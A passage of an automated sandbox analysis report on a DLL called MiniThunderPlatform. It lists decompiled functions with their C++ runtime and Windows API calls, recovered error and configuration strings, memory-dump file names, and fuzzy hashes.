                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71 ref: 100455BB
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 100455CB
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71 ref: 1004561F
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 1004562F
                                                                                                                                              Strings
                                                                                                                                              • bytes_transfered == _data_operate_bytes, xrefs: 10045657
                                                                                                                                              • SSL send: data transfered 0 bytes, the peer may have closed connection, xrefs: 100455B3
                                                                                                                                              • SSL send: send data to server error! throw exception: , xrefs: 10045617
                                                                                                                                              • .\AsynSSLSocket.cpp, xrefs: 1004564D
                                                                                                                                              • SSL send: get_complete_result call error, xrefs: 10045566
                                                                                                                                              • thunder_assert, xrefs: 10045652
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$??0exception@@ExceptionThrow$V01@@$?append@?$basic_string@H_prologV01@V12@V12@@Y?$basic_string@
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$SSL send: data transfered 0 bytes, the peer may have closed connection$SSL send: get_complete_result call error$SSL send: send data to server error! throw exception: $bytes_transfered == _data_operate_bytes$thunder_assert
                                                                                                                                              • API String ID: 3704557544-1270854338
                                                                                                                                              • Opcode ID: b9ecd9eb236870d5cae7c221eee3d16f0ce9996fbdd78ab3c2148ff555d7fb72
                                                                                                                                              • Instruction ID: be99cfe4c5911451b4f9101cd57026c5e694359b99a3ff71eccf1bf7082a4d74
                                                                                                                                              • Opcode Fuzzy Hash: b9ecd9eb236870d5cae7c221eee3d16f0ce9996fbdd78ab3c2148ff555d7fb72
                                                                                                                                              • Instruction Fuzzy Hash: A0315576104741ABC328DF64C884AABB7E8FF99711F508A1CF58A83641EB35E945CB92
                                                                                                                                              Function 100D0135 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100D014B
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D019D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100D01A4
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D01AB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D01BF
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100D01D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D0226
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100D0237
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6??1?$basic_string@D@std@@@0@V10@V?$basic_ostream@$??0?$basic_string@??0?$basic_stringstream@??6?$basic_ostream@?clear@ios_base@std@@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@H_prologV01@V01@@V?$basic_string@
                                                                                                                                              • String ID: $ no: $ occur exception, handle_open_notify return not modified, no retry$!
                                                                                                                                              • API String ID: 2209672085-2640593210
                                                                                                                                              • Opcode ID: cb5c49ffe4c382f6054231c35fde738bd2c259b6243f31c1680a3f1a7415a4af
                                                                                                                                              • Instruction ID: 92612b9dd6cb58d792517c1544890cfe669b470757b7069530fd1b01fd590f2f
                                                                                                                                              • Opcode Fuzzy Hash: cb5c49ffe4c382f6054231c35fde738bd2c259b6243f31c1680a3f1a7415a4af
                                                                                                                                              • Instruction Fuzzy Hash: 043170B41043849FD324CB60C89DBEBB7E4FB98700F404A5DF58A43252DB70A548CB66
                                                                                                                                              Function 100DD2B0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 238COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memmove.MSVCR71(?,?), ref: 100DD395
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000), ref: 100DD457
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100DD46C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD4E7
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000,?), ref: 100DD516
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?), ref: 100DD527
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD54B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD55C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?), ref: 100DD56D
                                                                                                                                                • Part of subcall function 100AF9E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CResourcesSetter,?,?,?,?,?,?,00000000,00000000,?), ref: 100AFA09
                                                                                                                                                • Part of subcall function 100AF9E0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AFA2F
                                                                                                                                                • Part of subcall function 10014340: InterlockedDecrement.KERNEL32(10311E80), ref: 1001434E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@DecrementInterlockedmemmove
                                                                                                                                              • String ID: c$gfff
                                                                                                                                              • API String ID: 1680021381-1983784439
                                                                                                                                              • Opcode ID: bb6eff1263310b6427cc1d442e93c4a20ee40318a6aedd158626c8de7735c4d1
                                                                                                                                              • Instruction ID: 1aa25339b5d23e612c7dfceb820b240f5919c7a3dd90b2c58e6509254590e706
                                                                                                                                              • Opcode Fuzzy Hash: bb6eff1263310b6427cc1d442e93c4a20ee40318a6aedd158626c8de7735c4d1
                                                                                                                                              • Instruction Fuzzy Hash: AD819FB65083819FCB14DF28D88095EBBE5FB88344F544A2EF99697301D731ED48CBA2
                                                                                                                                              Function 100AD4F4 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 222COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _CxxThrowException.MSVCR71(00000000,00000000), ref: 100AD4F8
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100AD503
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD596
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD656
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD663
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD785
                                                                                                                                                • Part of subcall function 100297D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10029815
                                                                                                                                                • Part of subcall function 100297D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10029825
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1002983B
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(1027B998), ref: 10029860
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10029881
                                                                                                                                                • Part of subcall function 100297D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10029890
                                                                                                                                                • Part of subcall function 100297D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1002989E
                                                                                                                                                • Part of subcall function 100297D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100298AB
                                                                                                                                                • Part of subcall function 100297D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100298C2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD74C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD75C
                                                                                                                                              Strings
                                                                                                                                              • _server_resource_ptr->range_type() == VSU_RANGE_URL, xrefs: 100AD540
                                                                                                                                              • thunder_assert, xrefs: 100AD53B
                                                                                                                                              • .\http_url_range_pipe.cpp, xrefs: 100AD536
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$?append@?$basic_string@V12@$V01@@V12@@$H_prolog$ExceptionThrow
                                                                                                                                              • String ID: .\http_url_range_pipe.cpp$_server_resource_ptr->range_type() == VSU_RANGE_URL$thunder_assert
                                                                                                                                              • API String ID: 1120380083-1684341167
                                                                                                                                              • Opcode ID: a092ffbf468469d1760ffe29b313ff6e9bb858d86194a758eec338f065086a36
                                                                                                                                              • Instruction ID: e53369935c4a52620519bbdfc467f49955dff2aeb8399c48e052a8819e45ace8
                                                                                                                                              • Opcode Fuzzy Hash: a092ffbf468469d1760ffe29b313ff6e9bb858d86194a758eec338f065086a36
                                                                                                                                              • Instruction Fuzzy Hash: A8A13B75900208EFDB15DFA4D984FDEBBB5FF19300F14819EE50AA7292DB30AA44CB61
                                                                                                                                              Function 10049060 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10050810: CreateIoCompletionPort.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 1005082B
                                                                                                                                                • Part of subcall function 10050810: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 10050835
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(set_recv_buffer,00000000,?,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963), ref: 100490B8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100490CC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000), ref: 100490FE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004910C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(recv_buffer_size), ref: 1004911B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(socket), ref: 1004912F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00002000), ref: 10049160
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004916E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$CompletionCreateErrorLastPort
                                                                                                                                              • String ID: recv_buffer_size$set_recv_buffer$socket
                                                                                                                                              • API String ID: 4151511053-3576694066
                                                                                                                                              • Opcode ID: 72e451af37b20c4f24797bf2c65da894c9cdb6a86c0c9b900c73b3cedbc90b3b
                                                                                                                                              • Instruction ID: 9a6822e2274e6d9bf26c949f75177489709e7f5944a3839999f203996f2b7adb
                                                                                                                                              • Opcode Fuzzy Hash: 72e451af37b20c4f24797bf2c65da894c9cdb6a86c0c9b900c73b3cedbc90b3b
                                                                                                                                              • Instruction Fuzzy Hash: 493157750083809FC325DF68C898A5BFBF4FBA9704F048A5DF59A83291DBB4A548CF52
                                                                                                                                              Function 10001323 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001328
                                                                                                                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP71(00000000,?), ref: 10001336
                                                                                                                                              • ??Bid@locale@std@@QAEIXZ.MSVCP71 ref: 1000134E
                                                                                                                                              • ?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP71(00000000), ref: 10001358
                                                                                                                                              • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@@Z.MSVCP71(?), ref: 1000136F
                                                                                                                                              • ??0bad_cast@@QAE@PBD@Z.MSVCR71(bad cast), ref: 10001383
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B1DB4), ref: 10001392
                                                                                                                                              • ?_Incref@facet@locale@std@@QAEXXZ.MSVCP71(00000000), ref: 100013A5
                                                                                                                                              • ?_Register@facet@locale@std@@QAEXXZ.MSVCP71 ref: 100013AD
                                                                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP71 ref: 100013BB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Lockit@std@@$??0_??0bad_cast@@??1_Bid@locale@std@@D@std@@ExceptionGetcat@?$ctype@Getfacet@locale@std@@H_prologIncref@facet@locale@std@@Register@facet@locale@std@@ThrowVfacet@12@Vfacet@locale@2@@
                                                                                                                                              • String ID: bad cast
                                                                                                                                              • API String ID: 27869159-3145022300
                                                                                                                                              • Opcode ID: 9569fc945d2a7ec4c6dbbc7ff8a21b6216d618267ef0baa061772fad66a3279a
                                                                                                                                              • Instruction ID: a4d00f82965f1c3e8cd9e560848bcd5521387feb246623fb74d34d844d43f995
                                                                                                                                              • Opcode Fuzzy Hash: 9569fc945d2a7ec4c6dbbc7ff8a21b6216d618267ef0baa061772fad66a3279a
                                                                                                                                              • Instruction Fuzzy Hash: 3F118F35900226DBCB24EBA4CC8C9EDB775FB1C761F410659F426A7290DB309944CB50
                                                                                                                                              Function 100D14FA Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100D14FF
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_notstable), ref: 100D1518
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(max_url_length), ref: 100D152E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hub_agent), ref: 100D1540
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,000000FF), ref: 100D156F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D157C
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1007196D
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10071984
                                                                                                                                                • Part of subcall function 10071940: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 10071998
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719CF
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719DE
                                                                                                                                                • Part of subcall function 10071940: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100719ED
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100D159F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D15AC
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_flag,00000000,0000009C,?), ref: 10071896
                                                                                                                                                • Part of subcall function 10071870: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100718AD
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071909
                                                                                                                                                • Part of subcall function 10071870: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007191B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??4?$basic_string@?assign@?$basic_string@H_prologV01@V12@V12@@
                                                                                                                                              • String ID: cmd_report_notstable$hub_agent$max_url_length
                                                                                                                                              • API String ID: 4173776902-3985622789
                                                                                                                                              • Opcode ID: 6387a3dbb02fd25aa3ae8b0a38e6f5e7df321d04092926fb6c50b7860f158a29
                                                                                                                                              • Instruction ID: ba84631ba7c91fdd1d893faa30b1ed561a9193cd5eb578d5811c23d93aa27981
                                                                                                                                              • Opcode Fuzzy Hash: 6387a3dbb02fd25aa3ae8b0a38e6f5e7df321d04092926fb6c50b7860f158a29
                                                                                                                                              • Instruction Fuzzy Hash: 84213B75800224DFD714DBA4C98DBDDB7F8FF18351F10829AE45AA32A0DB706A49CF25
                                                                                                                                              Function 100B1540 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_dphub_res,?), ref: 100B1622
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B1651
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_nondphub_res), ref: 100B1660
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B169F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_overlap_res), ref: 100B16AE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B16ED
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
